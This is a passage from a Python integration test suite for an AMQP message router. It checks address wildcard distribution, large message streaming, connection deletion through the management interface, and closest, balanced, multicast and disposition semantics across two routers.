AttachOnInterRouterTest(self.routers[0].addresses[5])\n test.run()\n self.assertIsNone(test.error)\n\n def test_17_address_wildcard(self):\n # verify proper distribution is selected by wildcard\n addresses = [\n # (address, count of messages expected to be received)\n ('a.b.c.d', 1), # closest 'a.b.c.d'\n ('b.c.d', 2), # multi '#.b.c.d'\n ('f.a.b.c.d', 2), # multi '#.b.c.d\n ('a.c.d', 2), # multi 'a.*.d'\n ('a/c/c/d', 1), # closest 'a/*/#.d\n ('a/x/z/z/d', 1), # closest 'a/*/#.d\n ('a/x/d', 1), # closest 'a.x.d'\n ('a.x.e', 1), # balanced ----\n ('m.b.c.d', 2) # multi '*/b/c/d'\n ]\n\n # two receivers per address - one for each router\n receivers = []\n for a in addresses:\n for x in range(2):\n ar = AsyncTestReceiver(address=self.routers[x].addresses[0],\n source=a[0])\n receivers.append(ar)\n\n # wait for the consumer info to propagate\n for a in addresses:\n self.routers[0].wait_address(a[0], 1, 1)\n self.routers[1].wait_address(a[0], 1, 1)\n\n # send one message to each address\n conn = BlockingConnection(self.routers[0].addresses[0])\n sender = conn.create_sender(address=None, options=AtLeastOnce())\n for a in addresses:\n sender.send(Message(address=a[0], body={'address': a[0]}))\n\n # count received messages by address\n msgs_recvd = {}\n for M in receivers:\n try:\n while True:\n i = M.queue.get(timeout=0.2).body.get('address', \"ERROR\")\n if i not in msgs_recvd:\n msgs_recvd[i] = 0\n msgs_recvd[i] += 1\n except AsyncTestReceiver.Empty:\n pass\n\n # verify expected count == actual count\n self.assertNotIn(\"ERROR\", msgs_recvd)\n for a in addresses:\n self.assertIn(a[0], msgs_recvd)\n self.assertEqual(a[1], msgs_recvd[a[0]])\n\n for M in receivers:\n M.stop()\n conn.close()\n\n def test_17_large_streaming_test(self):\n test = LargeMessageStreamTest(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_18_single_char_dest_test(self):\n test = SingleCharacterDestinationTest(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_19_delete_inter_router_connection(self):\n \"\"\"\n This test tries to delete an inter-router connection but is\n prevented from doing so.\n \"\"\"\n query_command = 'QUERY --type=connection'\n outputs = json.loads(self.run_skmanage(query_command))\n identity = None\n passed = False\n\n for output in outputs:\n if \"inter-router\" == output['role']:\n identity = output['identity']\n if identity:\n update_command = 'UPDATE --type=connection adminStatus=deleted --id=' + identity\n try:\n json.loads(self.run_skmanage(update_command))\n except Exception as e:\n if \"Forbidden\" in str(e):\n passed = True\n\n # The test has passed since we were forbidden from deleting\n # inter-router connections even though we are allowed to update the adminStatus field.\n self.assertTrue(passed)\n\n def test_20_delete_connection(self):\n \"\"\"\n This test creates a blocking connection and tries to delete that connection.\n Since there is no policy associated with this router, the default for allowAdminStatusUpdate is true,\n the delete operation will be permitted.\n \"\"\"\n\n # Create a connection with some properties so we can easily identify the connection\n connection = BlockingConnection(self.address(),\n properties=CONNECTION_PROPERTIES_UNICODE_STRING)\n query_command = 'QUERY --type=connection'\n outputs = json.loads(self.run_skmanage(query_command))\n identity = None\n passed = False\n\n print()\n\n for output in outputs:\n if output.get('properties'):\n conn_properties = output['properties']\n # Find the connection that has our properties - CONNECTION_PROPERTIES_UNICODE_STRING\n # Delete that connection and run another skmanage to see\n # if the connection is gone.\n if conn_properties.get('int_property'):\n identity = output.get(\"identity\")\n if identity:\n update_command = 'UPDATE --type=connection adminStatus=deleted --id=' + identity\n try:\n self.run_skmanage(update_command)\n query_command = 'QUERY --type=connection'\n outputs = json.loads(\n self.run_skmanage(query_command))\n no_properties = True\n for output in outputs:\n if output.get('properties'):\n no_properties = False\n conn_properties = output['properties']\n if conn_properties.get('int_property'):\n passed = False\n break\n else:\n passed = True\n if no_properties:\n passed = True\n except Exception as e:\n passed = False\n\n # The test has passed since we were allowed to delete a connection\n # because we have the policy permission to do so.\n self.assertTrue(passed)\n\n def test_21_delete_connection_with_receiver(self):\n test = DeleteConnectionWithReceiver(self.routers[0].addresses[0])\n self.assertEqual(test.error, None)\n test.run()\n\n def test_30_huge_address(self):\n # try a link with an extremely long address\n # DISPATCH-1461\n addr = \"A\" * 2019\n rx = AsyncTestReceiver(self.routers[0].addresses[0],\n source=addr)\n tx = AsyncTestSender(self.routers[1].addresses[0],\n target=addr,\n count=100)\n tx.wait()\n\n i = 100\n while i:\n try:\n rx.queue.get(timeout=TIMEOUT)\n i -= 1\n except AsyncTestReceiver.Empty:\n break\n self.assertEqual(0, i)\n rx.stop()\n\n\nclass DeleteConnectionWithReceiver(MessagingHandler):\n def __init__(self, address):\n super(DeleteConnectionWithReceiver, self).__init__()\n self.address = address\n self.mgmt_receiver = None\n self.mgmt_receiver_1 = None\n self.mgmt_receiver_2 = None\n self.conn_to_kill = None\n self.mgmt_conn = None\n self.mgmt_sender = None\n self.success = False\n self.error = None\n self.receiver_to_kill = None\n self.timer = None\n self.n_sent = 0\n self.n_received = 0\n self.mgmt_receiver_link_opened = False\n self.mgmt_receiver_1_link_opened = False\n self.mgmt_receiver_2_link_opened = False\n self.receiver_to_kill_link_opened = False\n self.query_timer = None\n self.deleted_admin_status = \"deleted\"\n self.num_attempts = 0\n self.max_attempts = 2\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n\n # Create a receiver connection with some properties so it\n # can be easily identified.\n self.conn_to_kill = event.container.connect(self.address, properties=CONNECTION_PROPERTIES_UNICODE_STRING)\n self.receiver_to_kill = event.container.create_receiver(self.conn_to_kill, \"hello_world\")\n self.mgmt_conn = event.container.connect(self.address)\n self.mgmt_sender = event.container.create_sender(self.mgmt_conn)\n self.mgmt_receiver = event.container.create_receiver(self.mgmt_conn, None, dynamic=True)\n self.mgmt_receiver_1 = event.container.create_receiver(self.mgmt_conn,\n None,\n dynamic=True)\n self.mgmt_receiver_2 = event.container.create_receiver(self.mgmt_conn,\n None,\n dynamic=True)\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d, received=%d\" % (self.n_sent, self.n_received)\n self.bail(self.error)\n\n def bail(self, error):\n self.error = error\n self.timer.cancel()\n self.mgmt_conn.close()\n self.conn_to_kill.close()\n if self.query_timer:\n self.query_timer.cancel()\n\n def on_link_opened(self, event):\n if event.receiver == self.mgmt_receiver:\n self.mgmt_receiver_link_opened = True\n elif event.receiver == self.mgmt_receiver_1:\n self.mgmt_receiver_1_link_opened = True\n elif event.receiver == self.mgmt_receiver_2:\n self.mgmt_receiver_2_link_opened = True\n elif event.receiver == self.receiver_to_kill:\n self.receiver_to_kill_link_opened = True\n\n # All the management receiver links have been opened, now send the first message.\n if self.mgmt_receiver_link_opened and self.mgmt_receiver_1_link_opened and \\\n self.mgmt_receiver_2_link_opened and self.receiver_to_kill_link_opened:\n request = Message()\n request.address = \"amqp:/_local/$management\"\n request.properties = {\n 'type': CONNECTION_TYPE,\n 'operation': 'QUERY'}\n request.reply_to = self.mgmt_receiver.remote_source.address\n self.mgmt_sender.send(request)\n self.n_sent += 1\n\n def poll_timeout(self):\n request = Message()\n request.address = \"amqp:/_local/$management\"\n request.properties = {'type': CONNECTION_TYPE,\n 'operation': 'QUERY'}\n request.reply_to = self.mgmt_receiver_2.remote_source.address\n self.mgmt_sender.send(request)\n self.n_sent += 1\n\n def on_message(self, event):\n if event.receiver == self.mgmt_receiver:\n self.n_received += 1\n attribute_names = event.message.body['attributeNames']\n property_index = attribute_names.index('properties')\n identity_index = attribute_names.index('identity')\n conn_found = False\n for result in event.message.body['results']:\n if result[property_index]:\n properties = result[property_index]\n if properties.get('int_property'):\n identity = result[identity_index]\n if identity:\n request = Message()\n request.address = \"amqp:/_local/$management\"\n request.properties = {\n 'identity': identity,\n 'type': CONNECTION_TYPE,\n 'operation': 'UPDATE'\n }\n request.body = {\n 'adminStatus': self.deleted_admin_status\n }\n request.reply_to = self.mgmt_receiver_1.remote_source.address\n self.mgmt_sender.send(request)\n conn_found = True\n self.n_sent += 1\n if not conn_found:\n self.bail(\"The connection we wanted to delete was not found\")\n elif event.receiver == self.mgmt_receiver_1:\n self.n_received += 1\n if event.message.properties['statusDescription'] == 'OK' and \\\n event.message.body['adminStatus'] == self.deleted_admin_status:\n # Wait for 3 sends for the connection to be gone completely.\n self.num_attempts += 1\n self.query_timer = event.reactor.schedule(3.0, PollTimeout(self))\n else:\n if event.message.properties['statusDescription'] != 'OK':\n error = \"Expected statusDescription to be OK but instead got %s\" % \\\n event.message.properties['statusDescription']\n elif event.message.body['adminStatus'] != self.deleted_admin_status:\n error = \"Expected adminStatus to be %s but instead got %s\" % \\\n (self.deleted_admin_status, event.message.properties['adminStatus'])\n self.bail(error)\n\n elif event.receiver == self.mgmt_receiver_2:\n self.n_received += 1\n attribute_names = event.message.body['attributeNames']\n property_index = attribute_names .index('properties')\n\n for result in event.message.body['results']:\n if result[property_index]:\n properties = result[property_index]\n if properties and properties.get('int_property'):\n if self.num_attempts == self.max_attempts:\n self.bail(\"Connection not deleted\")\n else:\n self.num_attempts += 1\n self.query_timer = event.reactor.schedule(3.0, PollTimeout(self))\n self.bail(None)\n\n def run(self):\n Container(self).run()\n\n\nclass SingleCharacterDestinationTest(MessagingHandler):\n def __init__(self, address1, address2):\n super(SingleCharacterDestinationTest, self).__init__()\n self.address1 = address1\n self.address2 = address2\n self.dest = \"x\"\n self.error = None\n self.conn1 = None\n self.conn2 = None\n self.count = 1\n self.n_sent = 0\n self.timer = None\n self.sender = None\n self.receiver = None\n self.n_received = 0\n self.body = \"xyz\"\n\n def check_if_done(self):\n if self.n_received == self.count:\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d, received=%d\" % (self.n_sent, self.n_received)\n self.conn1.close()\n self.conn2.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n self.receiver = event.container.create_receiver(self.conn2, self.dest)\n\n def on_sendable(self, event):\n if self.n_sent < self.count:\n msg = Message(body=self.body)\n event.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n self.n_received += 1\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass LargeMessageStreamTest(MessagingHandler):\n def __init__(self, address1, address2):\n super(LargeMessageStreamTest, self).__init__()\n self.address1 = address1\n self.address2 = address2\n self.dest = \"LargeMessageStreamTest\"\n self.error = None\n self.conn1 = None\n self.conn2 = None\n self.count = 10\n self.n_sent = 0\n self.timer = None\n self.sender = None\n self.receiver = None\n self.n_received = 0\n self.body = \"\"\n for i in range(10000):\n self.body += \"0123456789101112131415\"\n\n def check_if_done(self):\n if self.n_received == self.count:\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d, received=%d\" % (self.n_sent, self.n_received)\n self.conn1.close()\n self.conn2.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n self.receiver = event.container.create_receiver(self.conn2, self.dest)\n\n def on_sendable(self, event):\n if self.n_sent < self.count:\n msg = Message(body=self.body)\n # send(msg) calls the stream function which streams data from sender to the router\n event.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n self.n_received += 1\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass ExcessDeliveriesReleasedTest(MessagingHandler):\n def __init__(self, address1, address2):\n super(ExcessDeliveriesReleasedTest, self).__init__(prefetch=0)\n self.address1 = address1\n self.address2 = address2\n self.dest = \"closest.EDRtest\"\n self.error = None\n self.sender = None\n self.receiver = None\n self.n_sent = 0\n self.n_received = 0\n self.n_accepted = 0\n self.n_released = 0\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n\n def timeout(self):\n self.error = \"Timeout Expired\"\n self.conn1.close()\n self.conn2.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n self.receiver = event.container.create_receiver(self.conn2, self.dest)\n self.receiver.flow(6)\n\n def on_sendable(self, event):\n for i in range(10 - self.n_sent):\n msg = Message(body=i)\n event.sender.send(msg)\n self.n_sent += 1\n\n def on_accepted(self, event):\n self.n_accepted += 1\n\n def on_released(self, event):\n self.n_released += 1\n if self.n_released == 4:\n if self.n_accepted != 6:\n self.error = \"Expected 6 accepted, got %d\" % self.n_accepted\n if self.n_received != 6:\n self.error = \"Expected 6 received, got %d\" % self.n_received\n self.conn1.close()\n self.conn2.close()\n self.timer.cancel()\n\n def on_message(self, event):\n self.n_received += 1\n if self.n_received == 6:\n self.receiver.close()\n\n def run(self):\n Container(self).run()\n\n\nclass AttachOnInterRouterTest(MessagingHandler):\n \"\"\"Expect an error when attaching a link to an inter-router listener\"\"\"\n\n def __init__(self, address):\n super(AttachOnInterRouterTest, self).__init__(prefetch=0)\n self.address = address\n self.dest = \"AOIRtest\"\n self.error = None\n self.sender = None\n self.timer = None\n self.conn = None\n\n def timeout(self):\n self.error = \"Timeout Expired\"\n self.conn.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn = event.container.connect(self.address)\n self.sender = event.container.create_sender(self.conn, self.dest)\n\n def on_link_remote_close(self, event):\n self.conn.close()\n self.timer.cancel()\n\n def run(self):\n logging.disable(logging.ERROR) # Hide expected log errors\n try:\n Container(self).run()\n finally:\n logging.disable(logging.NOTSET) # Restore to normal\n\n\nclass DeliveriesInTransit(MessagingHandler):\n def __init__(self, address1, address2):\n super(DeliveriesInTransit, self).__init__()\n self.address1 = address1\n self.address2 = address2\n self.dest = \"pre_settled.1\"\n self.error = \"All messages not received\"\n self.n_sent = 0\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n self.sender = None\n self.num_msgs = 104\n self.sent_count = 0\n self.received_count = 0\n self.receiver = None\n\n def timeout(self):\n self.error = \"Timeout Expired: n_sent=%d n_received_count=%d\" % (self.n_sent, self.received_count)\n self.conn1.close()\n self.conn2.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n self.conn2 = event.container.connect(self.address2)\n self.receiver = event.container.create_receiver(self.conn2, self.dest)\n\n def on_sendable(self, event):\n if self.n_sent <= self.num_msgs - 1:\n msg = Message(body=\"Hello World\")\n self.sender.send(msg)\n self.n_sent += 1\n\n def check_if_done(self):\n if self.n_sent == self.received_count:\n self.error = None\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def on_message(self, event):\n self.received_count += 1\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass ManagementTest(MessagingHandler):\n def __init__(self, address):\n super(ManagementTest, self).__init__()\n self.address = address\n self.timer = None\n self.conn = None\n self.sender = None\n self.receiver = None\n self.sent_count = 0\n self.msg_not_sent = True\n self.error = None\n self.response1 = False\n self.response2 = False\n\n def timeout(self):\n if not self.response1:\n self.error = \"Incorrect response received for message with correlation id C1\"\n if not self.response1:\n self.error = self.error + \"Incorrect response received for message with correlation id C2\"\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn = event.container.connect(self.address)\n self.sender = event.container.create_sender(self.conn)\n self.receiver = event.container.create_receiver(self.conn, None, dynamic=True)\n\n def on_link_opened(self, event):\n if event.receiver == self.receiver:\n request = Message()\n request.correlation_id = \"C1\"\n request.address = \"amqp:/_local/$management\"\n request.properties = {'type': 'org.amqp.management', 'name': 'self', 'operation': 'GET-MGMT-NODES'}\n request.reply_to = self.receiver.remote_source.address\n self.sender.send(request)\n\n request = Message()\n request.address = \"amqp:/_topo/0/QDR.B/$management\"\n request.correlation_id = \"C2\"\n request.reply_to = self.receiver.remote_source.address\n request.properties = {'type': 'org.amqp.management', 'name': 'self', 'operation': 'GET-MGMT-NODES'}\n self.sender.send(request)\n\n def on_message(self, event):\n if event.receiver == self.receiver:\n if event.message.correlation_id == \"C1\":\n if event.message.properties['statusCode'] == 200 and \\\n event.message.properties['statusDescription'] is not None \\\n and 'amqp:/_topo/0/QDR.B/$management' in event.message.body:\n self.response1 = True\n elif event.message.correlation_id == \"C2\":\n if event.message.properties['statusCode'] == 200 and \\\n event.message.properties['statusDescription'] is not None \\\n and 'amqp:/_topo/0/QDR.A/$management' in event.message.body:\n self.response2 = True\n\n if self.response1 and self.response2:\n self.error = None\n\n if self.error is None:\n self.timer.cancel()\n self.conn.close()\n\n def run(self):\n Container(self).run()\n\n\nclass SenderSettlesFirst(MessagingHandler):\n def __init__(self, address1, address2):\n super(SenderSettlesFirst, self).__init__(auto_accept=False)\n self.address1 = address1\n self.address2 = address2\n self.dest = \"closest.senderfirst.1\"\n self.error = \"Message body received differs from the one sent\"\n self.n_sent = 0\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n self.sender = None\n self.sent_count = 0\n self.received_count = 0\n self.receiver = None\n self.msg_not_sent = True\n\n def timeout(self):\n self.error = \"Timeout Expired: \" + self.error\n self.conn1.close()\n self.conn2.close()\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn2 = event.container.connect(self.address2)\n self.receiver = event.container.create_receiver(self.conn2, self.dest)\n\n def on_link_opened(self, event):\n if event.receiver == self.receiver:\n self.conn1 = event.container.connect(self.address1)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n\n def on_sendable(self, event):\n if event.sender == self.sender:\n if self.msg_not_sent:\n msg = Message(body={'number': 0})\n dlv = event.sender.send(msg)\n dlv.settle()\n self.msg_not_sent = False\n\n def on_message(self, event):\n if event.receiver == self.receiver:\n if 0 == event.message.body['number']:\n self.error = None\n self.accept(event.delivery)\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def run(self):\n Container(self).run()\n\n\nclass MulticastUnsettled(MessagingHandler):\n def __init__(self, address):\n super(MulticastUnsettled, self).__init__()\n self.address = address\n self.dest = \"multicast.2\"\n self.error = None\n self.n_sent = 0\n self.count = 3\n self.n_received_a = 0\n self.n_received_b = 0\n self.n_received_c = 0\n self.timer = None\n self.conn = None\n self.sender = None\n self.receiver_a = None\n self.receiver_b = None\n self.receiver_c = None\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn = event.container.connect(self.address)\n self.sender = event.container.create_sender(self.conn, self.dest)\n self.receiver_a = event.container.create_receiver(self.conn, self.dest, name=\"A\")\n self.receiver_b = event.container.create_receiver(self.conn, self.dest, name=\"B\")\n self.receiver_c = event.container.create_receiver(self.conn, self.dest, name=\"C\")\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d rcvd=%d/%d/%d\" % \\\n (self.n_sent, self.n_received_a, self.n_received_b, self.n_received_c)\n self.conn.close()\n\n def check_if_done(self):\n if self.n_received_a + self.n_received_b + self.n_received_c == self.count:\n self.timer.cancel()\n self.conn.close()\n\n def on_sendable(self, event):\n if self.n_sent == 0:\n msg = Message(body=\"MulticastUnsettled-Test\")\n self.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n if event.receiver == self.receiver_a:\n self.n_received_a += 1\n if event.receiver == self.receiver_b:\n self.n_received_b += 1\n if event.receiver == self.receiver_c:\n self.n_received_c += 1\n\n def on_accepted(self, event):\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass SemanticsClosestIsLocal(MessagingHandler):\n def __init__(self, address1, address2):\n super(SemanticsClosestIsLocal, self).__init__()\n self.address1 = address1\n self.address2 = address2\n self.dest = \"closest.1\"\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n self.sender = None\n self.receiver_a = None\n self.receiver_b = None\n self.receiver_c = None\n self.num_messages = 100\n self.n_received_a = 0\n self.n_received_b = 0\n self.n_received_c = 0\n self.error = None\n self.n_sent = 0\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n # Receiver on same router as the sender must receive all the messages. The other two\n # receivers are on the other router\n self.receiver_a = event.container.create_receiver(self.conn1, self.dest, name=\"A\")\n self.receiver_b = event.container.create_receiver(self.conn2, self.dest, name=\"B\")\n self.receiver_c = event.container.create_receiver(self.conn2, self.dest, name=\"C\")\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d rcvd=%d/%d/%d\" % \\\n (self.n_sent, self.n_received_a, self.n_received_b, self.n_received_c)\n self.conn1.close()\n self.conn2.close()\n\n def check_if_done(self):\n if self.n_received_a == 100 and self.n_received_b + self.n_received_c == 0:\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def on_sendable(self, event):\n if self.n_sent < self.num_messages:\n msg = Message(body=\"SemanticsClosestIsLocal-Test\")\n self.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n if event.receiver == self.receiver_a:\n self.n_received_a += 1\n if event.receiver == self.receiver_b:\n self.n_received_b += 1\n if event.receiver == self.receiver_c:\n self.n_received_c += 1\n\n def on_accepted(self, event):\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass SemanticsClosestIsRemote(MessagingHandler):\n def __init__(self, address1, address2, router_check_remote, router_check_local):\n super(SemanticsClosestIsRemote, self).__init__()\n self.address1 = address1\n self.address2 = address2\n self.dest = \"closest.1\"\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n self.sender = None\n self.receiver_a = None\n self.receiver_b = None\n self.receiver_c = None\n self.num_messages = 100\n self.n_received_a = 0\n self.n_received_b = 0\n self.error = None\n self.n_sent = 0\n self.sender_created = False\n self.receiver_a_opened = False\n self.receiver_b_opened = False\n self.router_check_remote = router_check_remote\n self.router_check_local = router_check_local\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n # Receiver on same router as the sender must receive all the messages. The other two\n # receivers are on the other router\n self.receiver_a = event.container.create_receiver(self.conn2, self.dest, name=\"A\")\n self.receiver_b = event.container.create_receiver(self.conn2, self.dest, name=\"B\")\n\n def on_link_opened(self, event):\n if event.receiver == self.receiver_a:\n self.receiver_a_opened = True\n elif event.receiver == self.receiver_b:\n self.receiver_b_opened = True\n\n if self.receiver_a_opened and self.receiver_b_opened and not self.sender_created:\n self.router_check_remote.wait_address(self.dest, remotes=1)\n self.router_check_local.wait_address(self.dest, subscribers=2)\n self.sender = event.container.create_sender(self.conn1, self.dest)\n self.sender_created = True\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d rcvd=%d/%d\" % \\\n (self.n_sent, self.n_received_a, self.n_received_b)\n self.conn1.close()\n self.conn2.close()\n\n def check_if_done(self):\n if self.n_received_a + self.n_received_b == 100 and self.n_received_a > 0 and self.n_received_b > 0:\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n\n def on_sendable(self, event):\n if self.n_sent < self.num_messages:\n msg = Message(body=\"SemanticsClosestIsRemote-Test\")\n self.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n if event.receiver == self.receiver_a:\n self.n_received_a += 1\n if event.receiver == self.receiver_b:\n self.n_received_b += 1\n\n def on_accepted(self, event):\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass CustomTimeout:\n def __init__(self, parent):\n self.parent = parent\n\n def addr_text(self, addr):\n if not addr:\n return \"\"\n return addr[1:]\n\n def on_timer_task(self, event):\n local_node = Node.connect(self.parent.address1, timeout=TIMEOUT)\n\n res = local_node.query(ROUTER_ADDRESS_TYPE)\n name = res.attribute_names.index('name')\n found = False\n for results in res.results:\n if \"balanced.1\" == self.addr_text(results[name]):\n found = True\n break\n\n if found:\n self.parent.cancel_custom()\n self.parent.create_sender(event)\n\n else:\n event.reactor.schedule(2, self)\n\n\nclass SemanticsBalanced(MessagingHandler):\n def __init__(self, address1, address2, address3):\n super(SemanticsBalanced, self).__init__(auto_accept=False, prefetch=0)\n self.address1 = address1\n self.address2 = address2\n self.address3 = address3\n self.dest = \"balanced.1\"\n self.timer = None\n self.conn1 = None\n self.conn2 = None\n self.conn3 = None\n self.sender = None\n self.receiver_a = None\n self.receiver_b = None\n self.receiver_c = None\n self.num_messages = 400\n self.n_received_a = 0\n self.n_received_b = 0\n self.n_received_c = 0\n self.error = None\n self.n_sent = 0\n self.rx_set = []\n self.custom_timer = None\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.custom_timer = event.reactor.schedule(2, CustomTimeout(self))\n self.conn1 = event.container.connect(self.address1)\n self.conn2 = event.container.connect(self.address2)\n self.conn3 = event.container.connect(self.address3)\n\n # This receiver is on the same router as the sender\n self.receiver_a = event.container.create_receiver(self.conn2, self.dest, name=\"A\")\n\n # These two receivers are connected to a different router than the sender\n self.receiver_b = event.container.create_receiver(self.conn3, self.dest, name=\"B\")\n self.receiver_c = event.container.create_receiver(self.conn3, self.dest, name=\"C\")\n\n self.receiver_a.flow(300)\n self.receiver_b.flow(300)\n self.receiver_c.flow(300)\n\n def cancel_custom(self):\n self.custom_timer.cancel()\n\n def create_sender(self, event):\n self.sender = event.container.create_sender(self.conn1, self.dest)\n\n def timeout(self):\n self.error = \"Timeout Expired: sent=%d rcvd=%d/%d/%d\" % \\\n (self.n_sent, self.n_received_a, self.n_received_b, self.n_received_c)\n self.conn1.close()\n self.conn2.close()\n self.conn3.close()\n\n def check_if_done(self):\n if self.n_received_a + self.n_received_b + self.n_received_c == self.num_messages and \\\n self.n_received_a > 0 and self.n_received_b > 0 and self.n_received_c > 0:\n self.rx_set.sort()\n all_messages_received = True\n for i in range(self.num_messages):\n if not i == self.rx_set[i]:\n all_messages_received = False\n\n if all_messages_received:\n self.timer.cancel()\n self.conn1.close()\n self.conn2.close()\n self.conn3.close()\n\n def on_sendable(self, event):\n if self.n_sent < self.num_messages:\n msg = Message(body={'number': self.n_sent})\n self.sender.send(msg)\n self.n_sent += 1\n\n def on_message(self, event):\n if event.receiver == self.receiver_a:\n self.n_received_a += 1\n self.rx_set.append(event.message.body['number'])\n elif event.receiver == self.receiver_b:\n self.n_received_b += 1\n self.rx_set.append(event.message.body['number'])\n elif event.receiver == self.receiver_c:\n self.n_received_c += 1\n self.rx_set.append(event.message.body['number'])\n\n self.check_if_done()\n\n def run(self):\n Container(self).run()\n\n\nclass PropagatedDisposition(MessagingHandler):\n \"\"\"\n Verify outcomes are properly sent end-to-end\n \"\"\"\n\n def __init__(self, test, sender_addr, receiver_addr, dest):\n super(PropagatedDisposition, self).__init__(auto_accept=False)\n self.sender_addr = sender_addr\n self.receiver_addr = receiver_addr\n self.dest = dest\n self.settled = []\n self.test = test\n self.sender = None\n self.receiver = None\n self.sender_conn = None\n self.receiver_conn = None\n self.passed = False\n self.dispos = ['accept', 'modified', 'reject']\n self.dispos_index = 0\n self.trackers = {}\n self.timer = None\n self.error = None\n\n def on_start(self, event):\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n self.sender_conn = event.container.connect(self.sender_addr)\n self.receiver_conn = event.container.connect(self.receiver_addr)\n\n self.receiver = event.container.create_receiver(self.receiver_conn,\n self.dest)\n self.sender = event.container.create_sender(self.sender_conn,\n self.dest)\n\n def on_sendable(self, event):\n # This function is called when the sender has credit to send\n if self.dispos_index < 3:\n self.trackers[self.sender.send(Message(body=self.dispos[self.dispos_index]))] = self.dispos[self.dispos_index]\n self.dispos_index += 1\n\n def timeout(self):\n unique_list = sorted(list(dict.fromkeys(self.settled)))\n self.error = \"Timeout Expired: Expected ['accept', 'modified', 'reject'] got %s\" % unique_list\n self.sender_conn.close()\n self.receiver_conn.close()\n\n def check(self):\n unique_list = sorted(list(dict.fromkeys(self.settled)))\n if unique_list == ['accept', 'modified', 'reject']:\n self.passed = True\n self.sender_conn.close()\n self.receiver_conn.close()\n self.timer.cancel()\n\n def on_message(self, event):\n if event.message.body == 'accept':\n event.delivery.update(Delivery.ACCEPTED)\n event.delivery.settle()\n elif event.message.body == 'reject':\n self.set_rejected_data(event.delivery.local)\n event.delivery.update(Delivery.REJECTED)\n event.delivery.settle()\n elif event.message.body == 'modified':\n self.set_modified_data(event.delivery.local)\n event.delivery.update(Delivery.MODIFIED)\n event.delivery.settle()\n\n def on_accepted(self, event):\n self.test.assertEqual(Delivery.ACCEPTED, event.delivery.remote_state)\n self.test.assertEqual('accept', self.trackers[event.delivery])\n self.settled.append('accept')\n self.check()\n\n def on_rejected(self, event):\n self.test.assertEqual(Delivery.REJECTED, event.delivery.remote_state)\n self.test.assertEqual('reject', self.trackers[event.delivery])\n self.check_rejected_data(event.delivery.remote)\n self.settled.append('reject')\n self.check()\n\n def on_released(self, event):\n # yes, for some reason Proton triggers on_released when MODIFIED is set\n self.test.assertEqual(Delivery.MODIFIED, event.delivery.remote_state)\n self.test.assertEqual('modified', self.trackers[event.delivery])\n self.check_modified_data(event.delivery.remote)\n self.settled.append('modified')\n self.check()\n\n def set_rejected_data(self, local_state):\n # use defaults\n pass\n\n def check_rejected_data(self, remote_state):\n self.test.assertTrue(remote_state.condition is None)\n\n def set_modified_data(self, local_state):\n # use defaults\n pass\n\n def check_modified_data(self, remote_state):\n 